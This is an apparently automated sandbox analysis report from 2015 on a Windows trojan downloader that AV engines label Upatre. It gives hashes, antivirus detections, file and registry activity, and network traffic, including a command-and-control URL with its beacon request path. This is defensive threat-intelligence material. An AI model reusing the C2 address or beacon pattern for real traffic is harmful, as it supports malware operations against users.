Analysis Date: 2015-08-10 14:31:38
MD5: 6c735c2114a2b6973dcda50fe55fc104
SHA1: 3728b6a8d3e6e901d88524c40ff28fbe0140a638

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 191674926a8b01849779df89974c9376 sha1: 60370603e262090911189badec69e3977a1ce739 size: 8704
Section .rdata: md5: 64d0ee179272f58bee0982d8a62a2840 sha1: 5914df5c2d3f681337ecbb97aef70230e3398829 size: 4096
Section .data: md5: df1e9cab01d1e0fba3b2e7ce9044dbaa sha1: 99140dfb4f6c1ea2cbc54b88ab18e535cb498b8e size: 1024
Section .rsrc: md5: 926804f63b74fc827bd9d46f493e08dc sha1: 2e57a470ebddbea78e103df5d289a788afe1f8ef size: 20480
Timestamp: 2014-07-14 05:36:48
Packer: Microsoft Visual C++ v6.0
PEhash: 473bc989fa837248050401ff7aac1b8565daed34
IMPhash: 9f9e95f9db59de9e95416835d48a17dc
AV Symantec: Downloader.Upatre!gen5
AV MicroWorld (escan): Trojan.Upatre.Gen.3
AV Avira (antivir): TR/Yarwi.djamna
AV Eset (nod32): Win32/Kryptik.DHFK
AV Microsoft Security Essentials: TrojanDownloader:Win32/Upatre!rfn
AV Ikarus: Trojan.Win32.Kadena
AV BitDefender: Trojan.Upatre.Gen.3
AV Twister: TrojanDldr.Upatre.jgz.wenm
AV Arcabit (arcavir): Trojan.Upatre.Gen.3
AV Alwil (avast): Dyre-K [Trj]
AV Fortinet: W32/Kryptik.DIRZ!tr
AV Padvish: no_virus
AV Trend Micro: TROJ_UPATRE.SM05
AV Emsisoft: Trojan.Upatre.Gen.3
AV MalwareBytes: Trojan.Upatre
AV K7: Trojan-Downloader ( 004c16281 )
AV Grisoft (avg): Generic_s.EPS
AV Ad-Aware: Trojan.Upatre.Gen.3
AV Rising: Trojan.Win32.Kryptik.af
AV Dr. Web: Trojan.DownLoader13.9549
AV Mcafee: Downloader-FASG!6C735C2114A2
AV CA (E-Trust Ino): no_virus
AV VirusBlokAda (vba32): TrojanDownloader.Upatre
AV Frisk (f-prot): W32/Dalexis.H.gen!Eldorado
AV ClamAV: no_virus
AV BullGuard: Trojan.Upatre.Gen.3
AV CAT (quickheal): Trojan.Kadena.B4
AV Kaspersky: Trojan-Downloader.Win32.Upatre.jgz
AV Zillya!: Downloader.CTBLocker.Win32.23
AV F-Secure: Trojan.Upatre.Gen.3
AV Authentium: W32/Dalexis.H.gen!Eldorado

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\xov1795.tmp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\xoveere.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\xoveere.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\xoveere.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\icanhazip[1].htm
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Deletes File: C:\malware.exe
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!

Network Details:

DNS icanhazip.com (Type: A): 104.238.141.75
DNS icanhazip.com (Type: A): 104.238.136.31
DNS icanhazip.com (Type: A): 104.238.145.30
HTTP GET: http://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0
HTTP GET: http://91.211.17.201:13466/MOUSE12/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0


Strings